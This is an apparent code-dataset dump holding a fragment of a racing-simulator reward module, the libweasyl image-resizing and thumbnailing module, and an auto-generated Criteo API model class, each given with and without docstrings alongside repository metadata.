step_metrics[StepMetrics.Y.value] = \
reward_params[RewardParam.Y.value[0]] = model_point.y
step_metrics[StepMetrics.YAW.value] = \
reward_params[RewardParam.HEADING.value[0]] = \
Rotation.from_quat(model_orientation).as_euler('zyx')[0] * 180.0 / math.pi
step_metrics[StepMetrics.CLS_WAYPNT.value] = \
next_index if distance_from_next < distance_from_prev else prev_index
step_metrics[StepMetrics.TRACK_LEN.value] = track_data.get_track_length()
step_metrics[StepMetrics.STEER.value] = \
reward_params[RewardParam.STEER.value[0]] = \
float(json_actions[action]['steering_angle'])
step_metrics[StepMetrics.THROTTLE.value] = \
reward_params[RewardParam.SPEED.value[0]] = \
float(json_actions[action]['speed'])
step_metrics[StepMetrics.WHEELS_TRACK.value] = \
reward_params[RewardParam.WHEELS_ON_TRACK.value[0]] = all(wheel_on_track)
step_metrics[StepMetrics.ACTION.value] = action
model_heading = reward_params[RewardParam.HEADING.value[0]]
obstacle_reward_params = track_data.get_object_reward_params(agent_name,
model_point,
car_pose)
if obstacle_reward_params:
reward_params.update(obstacle_reward_params)
except KeyError as ex:
raise GenericRolloutException("Key {}, not found".format(ex))
except Exception as ex:
raise GenericRolloutException('Cannot compute reward and metrics: {}'.format(ex))
def compute_current_prog(current_progress, prev_progress):
current_progress = 100 * current_progress
if current_progress <= 0:
current_progress += 100
if prev_progress > current_progress + 50.0:
current_progress += 100.0
if current_progress > prev_progress + 50.0:
current_progress -= 100.0
current_progress = min(current_progress, 100)
return current_progress
def get_normalized_progress(current_progress, start_ndist):
return (current_progress + start_ndist * 100) % 100
def send_action(velocity_pub_dict, steering_pub_dict, steering_angle, speed):
for _, pub in velocity_pub_dict.items():
pub.publish(speed)
for _, pub in steering_pub_dict.items():
pub.publish(steering_angle)
def load_action_space(path_to_json):
json_actions = None
try:
with open(path_to_json, 'r') as file:
model_metadata = json.load(file)
json_actions = model_metadata['action_space']
LOGGER.info("Loaded action space from file: %s", json_actions)
except Exception as ex:
from markov.defaults import model_metadata
json_actions = model_metadata['action_space']
LOGGER.info("Exception %s on loading custom action space, using default: %s", \
ex, json_actions)
action_space = DiscreteActionSpace(num_actions=len(json_actions),
default_action=next((i for i, v in enumerate(json_actions) \
if v['steering_angle'] == 0), None))
return action_space, json_actions
def get_speed_factor(version):
if version == SIMAPP_VERSION_3:
return 2.77
elif version == SIMAPP_VERSION_2:
return 3.5
elif version == SIMAPP_VERSION_1:
return 1.0
else:
raise Exception("No velocity factor for given version")
| true | true |
1c2cd1474a3b9481174d115859d86e3006790643 | 8,437 | py | Python | libweasyl/libweasyl/images.py | akash143143/weasyl | be42a2313e657e97c4a48432379e37b6a3d4a4af | [
"Apache-2.0"
] | null | null | null | libweasyl/libweasyl/images.py | akash143143/weasyl | be42a2313e657e97c4a48432379e37b6a3d4a4af | [
"Apache-2.0"
] | null | null | null | libweasyl/libweasyl/images.py | akash143143/weasyl | be42a2313e657e97c4a48432379e37b6a3d4a4af | [
"Apache-2.0"
] | null | null | null | """
Image manipulation.
This module defines functions which work on sanpera_ ``Image`` objects.
.. _sanpera: https://pypi.python.org/pypi/sanpera
"""
from __future__ import division
from sanpera.image import Image
from sanpera import geometry
from libweasyl.exceptions import ThumbnailingError
COVER_SIZE = 1024, 3000
"The maximum size of a cover image, in pixels."
THUMB_HEIGHT = 250
"The maximum height of a thumbnail, in pixels."
read = Image.read
"""
libweasyl.images.read(*filename*)
Read an ``Image`` from disk using the given filename.
Parameters:
filename: The filename of the image to load.
Returns:
A sanpera ``Image``.
"""
from_buffer = Image.from_buffer
"""
libweasyl.images.from_buffer(*data*)
Parse some data into an ``Image``.
Parameters:
data: :term:`bytes`.
Returns:
A sanpera ``Image``.
"""
# Maps sanpera's original_format byte strings to canonical file extensions.
IMAGE_EXTENSIONS = {
    b'JPG': '.jpg',
    b'JPEG': '.jpg',
    b'PNG': '.png',
    b'GIF': '.gif',
}


def image_extension(im):
    """
    Given a sanpera ``Image``, return the file extension corresponding with the
    original format of the image.

    Parameters:
        im: A sanpera ``Image``.

    Returns:
        :term:`native string`: one of ``.jpg``, ``.png``, ``.gif``, or ``None``
        if the format was unknown.
    """
    return IMAGE_EXTENSIONS.get(im.original_format)


def image_file_type(im):
    """
    Given a sanpera ``Image``, return the file type of the original format of
    the image.

    This is :py:func:`.image_extension` without the leading ``.`` on the
    result.

    Parameters:
        im: A sanpera ``Image``.

    Returns:
        :term:`native string`: one of ``jpg``, ``png``, ``gif``, or ``None`` if
        the format was unknown.
    """
    extension = image_extension(im)
    return None if extension is None else extension.lstrip('.')
def unanimate(im):
    """
    Get the non-animated version of a sanpera ``Image``.

    Parameters:
        im: A sanpera ``Image``.

    Returns:
        *im* itself if it has only one frame; otherwise a new ``Image``
        containing just the first frame of *im*.
    """
    if len(im) > 1:
        first_frame_only = Image()
        first_frame_only.append(im[0])
        return first_frame_only
    return im
def correct_image_and_call(f, im, *a, **kw):
    """
    Call a function, passing in an image where the canvas size of each frame is
    the same.

    The function is invoked as ``f(im, *a, **kw)`` and may return an image to
    post-process or ``None``. Post-processing is currently limited to
    optimizing animated GIFs.

    Parameters:
        f: The function to call.
        im: A sanpera ``Image``.
        *a: Positional arguments with which to call *f*.
        **kw: Keyword arguments with which to call *f*.

    Returns:
        *im*, if *f* returned ``None``, or the ``Image`` returned by *f* after
        post-processing.
    """
    is_animated = len(im) > 1
    # Normalize so that every frame shares one canvas size, i.e. so that
    # `all(im.size == frame.size for frame in im)` holds afterwards.
    normalized = im.coalesced() if is_animated else im.cropped(im[0].canvas)
    # f may hand back a new image to post-process, or None.
    result = f(normalized, *a, **kw)
    if is_animated and result is not None:
        result = result.optimized_for_animated_gif()
    return result
def _resize(im, width, height):
# resize only if we need to; return None if we don't
if im.size.width > width or im.size.height > height:
im = im.resized(im.size.fit_inside((width, height)))
return im
def resize_image(im, width, height):
    """
    Resize an image if necessary. Images that already fit entirely within the
    target dimensions are returned untouched.

    Parameters:
        im: A sanpera ``Image``.
        width: The maximum width, in pixels.
        height: The maximum height, in pixels.

    Returns:
        *im*, if the image already fits within *width* by *height*. Otherwise,
        a new ``Image`` resized to fit.
    """
    resized = correct_image_and_call(_resize, im, width, height)
    return resized if resized else im
def make_cover_image(im):
    """
    Make a cover image.

    That is, shrink an image to fit within :py:data:`COVER_SIZE` if necessary.

    Parameters:
        im: A sanpera ``Image``.

    Returns:
        *im*, if the image already fits within :py:data:`COVER_SIZE`.
        Otherwise, a new ``Image`` resized to fit.
    """
    max_width, max_height = COVER_SIZE
    return resize_image(im, max_width, max_height)
def _height_resize(im, height, bounds=None):
    """Creates an image scaled to no more than the specified height with 0.5 <= aspect ratio <= 2.

    Parameters:
        im: A sanpera ``Image`` (expected to have every frame on one canvas,
            as produced by :py:func:`correct_image_and_call`).
        height: The maximum height of the result, in pixels.
        bounds: Optionally, a sanpera ``Rectangle`` to crop *im* to before any
            other processing.

    Returns:
        A new ``Image`` no taller than *height* whose aspect ratio has been
        clamped to [0.5, 2] by cropping, or *im* itself when no change is
        needed.
    """
    def crop_image_to_width(image, width): # Crops from both sides equally.
        overflow = image.size.width - width
        border = overflow / 2
        crop_rect = geometry.Rectangle(border, 0, border + width, image.size.height)
        return image.cropped(crop_rect)
    def crop_image_to_height(image, height): # Crops from the bottom.
        crop_rect = geometry.Rectangle(0, 0, image.size.width, height)
        return image.cropped(crop_rect)
    def scale_image_to_height(image, height): # Proportional scale to `height`.
        new_width = (image.size.width * height) / image.size.height
        return image.resized((new_width, height))
    if bounds is not None:
        # TODO: Add some checks here. e.g. make sure bounds are smaller
        # than the original image.
        if bounds.size != im.size:
            im = im.cropped(bounds)
    # Width-to-height ratio of the (possibly cropped) image.
    aspect_ratio = float(im.size.width) / im.size.height
    if im.size.height > height:
        if aspect_ratio > 2: # Image is too wide.
            thumb = crop_image_to_width(im, im.size.height * 2)
        elif aspect_ratio < 0.5: # Image is too tall.
            # Crop to twice the width, but never below the target height so
            # the scale below does not have to upscale.
            new_height = im.size.width * 2
            if new_height < height:
                new_height = height
            thumb = crop_image_to_height(im, new_height)
        else:
            thumb = im
        thumb = scale_image_to_height(thumb, height)
    else: # Height `height` or less.
        # Already short enough; only fix an overly wide aspect ratio.
        if im.size.width > height * 2:
            thumb = crop_image_to_width(im, height * 2)
        else:
            thumb = im
    return thumb
def height_resize(im, height, bounds=None):
    """
    Resize and crop an image to look good at a specified height.

    The image is resized and cropped according to the following rules:

    If *im* is not taller than *height*, its width is checked. If it is wider
    than 2 * *height*, it is cropped from both sides down to 2 * *height*
    width.

    If *im* is taller than *height*, its aspect ratio is considered: when *im*
    is more than twice as wide as it is tall, it is cropped equally from left
    and right to be twice as wide as it is tall. When *im* is more than twice
    as tall as it is wide, it is cropped from the bottom to be twice as tall
    as it is wide, but not if this would make it shorter than *height*. After
    cropping is considered, the image is resized proportionally to be *height*
    pixels tall.

    Parameters:
        im: A sanpera ``Image``.
        height: The desired height of the resulting image.
        bounds: Optionally, a sanpera ``Rectangle`` to use to crop *im* before
            resizing it.

    Returns:
        *im*, if it is no taller than *height* and no wider than 2 * *height*.
        Otherwise, a new ``Image`` resized and/or cropped according to the
        rules above.

    Raises:
        ThumbnailingError: if the result somehow violates the height contract.
    """
    thumb = correct_image_and_call(_height_resize, im, height, bounds)
    # Sanity check that _height_resize() honored the height contract.
    too_tall = (thumb.size.height > height
                or (len(thumb) == 1 and thumb[0].size.height > height))
    if too_tall:
        raise ThumbnailingError(thumb.size, thumb[0].size)
    return thumb
def make_thumbnail(im, bounds=None):
    """
    Make a thumbnail.

    That is, drop any animation from the image and resize it to be no taller
    than :py:data:`THUMB_HEIGHT`, keeping a reasonable aspect ratio (2x) if
    possible.

    Parameters:
        im: A sanpera ``Image``.
        bounds: Optionally, a sanpera ``Rectangle`` to use to crop *im* before
            generating a thumbnail from it.

    Returns:
        *im*, if the image fits within :py:data:`THUMB_HEIGHT` by twice
        :py:data:`THUMB_HEIGHT` and contains only a single frame. Otherwise,
        a new single-frame ``Image`` resized to fit within the bounds.
    """
    still_image = unanimate(im)
    return height_resize(still_image, THUMB_HEIGHT, bounds)
| 29.603509 | 101 | 0.633875 |
from __future__ import division
from sanpera.image import Image
from sanpera import geometry
from libweasyl.exceptions import ThumbnailingError
COVER_SIZE = 1024, 3000
THUMB_HEIGHT = 250
read = Image.read
from_buffer = Image.from_buffer
IMAGE_EXTENSIONS = {
b'JPG': '.jpg',
b'JPEG': '.jpg',
b'PNG': '.png',
b'GIF': '.gif',
}
def image_extension(im):
return IMAGE_EXTENSIONS.get(im.original_format)
def image_file_type(im):
ret = image_extension(im)
if ret is not None:
ret = ret.lstrip('.')
return ret
def unanimate(im):
if len(im) == 1:
return im
ret = Image()
ret.append(im[0])
return ret
def correct_image_and_call(f, im, *a, **kw):
animated = len(im) > 1
if animated:
im = im.coalesced()
else:
im = im.cropped(im[0].canvas)
im = f(im, *a, **kw)
if animated and im is not None:
im = im.optimized_for_animated_gif()
return im
def _resize(im, width, height):
if im.size.width > width or im.size.height > height:
im = im.resized(im.size.fit_inside((width, height)))
return im
def resize_image(im, width, height):
return correct_image_and_call(_resize, im, width, height) or im
def make_cover_image(im):
return resize_image(im, *COVER_SIZE)
def _height_resize(im, height, bounds=None):
def crop_image_to_width(image, width): # Crops from both sides equally.
overflow = image.size.width - width
border = overflow / 2
crop_rect = geometry.Rectangle(border, 0, border + width, image.size.height)
return image.cropped(crop_rect)
def crop_image_to_height(image, height): # Crops from the bottom.
crop_rect = geometry.Rectangle(0, 0, image.size.width, height)
return image.cropped(crop_rect)
def scale_image_to_height(image, height):
new_width = (image.size.width * height) / image.size.height
return image.resized((new_width, height))
if bounds is not None:
# TODO: Add some checks here. e.g. make sure bounds are smaller
# than the original image.
if bounds.size != im.size:
im = im.cropped(bounds)
aspect_ratio = float(im.size.width) / im.size.height
if im.size.height > height:
if aspect_ratio > 2: # Image is too wide.
thumb = crop_image_to_width(im, im.size.height * 2)
elif aspect_ratio < 0.5: # Image is too tall.
new_height = im.size.width * 2
if new_height < height:
new_height = height
thumb = crop_image_to_height(im, new_height)
else:
thumb = im
thumb = scale_image_to_height(thumb, height)
else: # Height `height` or less.
if im.size.width > height * 2:
thumb = crop_image_to_width(im, height * 2)
else:
thumb = im
return thumb
def height_resize(im, height, bounds=None):
ret = correct_image_and_call(_height_resize, im, height, bounds)
if ret.size.height > height or (len(ret) == 1 and ret[0].size.height > height):
# This is a sanity test to make sure the output of _height_resize()
# conforms to our height contract.
raise ThumbnailingError(ret.size, ret[0].size)
return ret
def make_thumbnail(im, bounds=None):
return height_resize(unanimate(im), THUMB_HEIGHT, bounds)
| true | true |
1c2cd14fafa9f48e4ed0479faf1803de1b1978dd | 4,715 | py | Python | criteo_marketing_transition/models/basic_audience_definition.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | null | null | null | criteo_marketing_transition/models/basic_audience_definition.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | null | null | null | criteo_marketing_transition/models/basic_audience_definition.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | 1 | 2022-02-21T11:16:20.000Z | 2022-02-21T11:16:20.000Z | # coding: utf-8
"""
Criteo API Transition Swagger
This is used to help Criteo clients transition from MAPI to Criteo API # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class BasicAudienceDefinition(object):
    """OpenAPI model for a basic audience definition.

    NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """

    # Attribute name -> attribute type, as declared in the OpenAPI document.
    openapi_types = {
        'id': 'str',
        'type': 'str',
        'attributes': 'AudienceNameDescription'
    }

    # Attribute name -> JSON key in the definition.
    attribute_map = {
        'id': 'id',
        'type': 'type',
        'attributes': 'attributes'
    }

    def __init__(self, id=None, type=None, attributes=None):  # noqa: E501
        """BasicAudienceDefinition - a model defined in OpenAPI.

        Raises:
            ValueError: if *id* or *type* is ``None`` (both are required).
        """
        self._id = None
        self._type = None
        self._attributes = None
        self.discriminator = None
        # Assigning through the properties enforces the required-field checks.
        self.id = id
        self.type = type
        if attributes is not None:
            self.attributes = attributes

    @property
    def id(self):
        """The id of the entity type.

        :rtype: str
        """
        return self._id

    @id.setter
    def id(self, value):
        """Set the id of the entity type; ``None`` is rejected."""
        if value is None:
            raise ValueError("Invalid value for `id`, must not be `None`")  # noqa: E501
        self._id = value

    @property
    def type(self):
        """The name of the entity type.

        :rtype: str
        """
        return self._type

    @type.setter
    def type(self, value):
        """Set the name of the entity type; ``None`` is rejected."""
        if value is None:
            raise ValueError("Invalid value for `type`, must not be `None`")  # noqa: E501
        self._type = value

    @property
    def attributes(self):
        """The attributes of this BasicAudienceDefinition.

        :rtype: AudienceNameDescription
        """
        return self._attributes

    @attributes.setter
    def attributes(self, value):
        """Set the attributes of this BasicAudienceDefinition."""
        self._attributes = value

    def to_dict(self):
        """Returns the model properties as a dict"""
        def _serialize(value):
            # Recursively convert nested models (anything with to_dict) while
            # leaving plain values untouched.
            if isinstance(value, list):
                return [item.to_dict() if hasattr(item, "to_dict") else item
                        for item in value]
            if hasattr(value, "to_dict"):
                return value.to_dict()
            if isinstance(value, dict):
                return {key: val.to_dict() if hasattr(val, "to_dict") else val
                        for key, val in value.items()}
            return value

        return {attr: _serialize(getattr(self, attr))
                for attr in self.openapi_types}

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return (isinstance(other, BasicAudienceDefinition)
                and self.__dict__ == other.__dict__)

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 27.573099 | 90 | 0.572216 |
import pprint
import re
import six
class BasicAudienceDefinition(object):
openapi_types = {
'id': 'str',
'type': 'str',
'attributes': 'AudienceNameDescription'
}
attribute_map = {
'id': 'id',
'type': 'type',
'attributes': 'attributes'
}
def __init__(self, id=None, type=None, attributes=None):
self._id = None
self._type = None
self._attributes = None
self.discriminator = None
self.id = id
self.type = type
if attributes is not None:
self.attributes = attributes
@property
def id(self):
return self._id
@id.setter
def id(self, id):
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`")
self._id = id
@property
def type(self):
return self._type
@type.setter
def type(self, type):
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`")
self._type = type
@property
def attributes(self):
return self._attributes
@attributes.setter
def attributes(self, attributes):
self._attributes = attributes
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, BasicAudienceDefinition):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.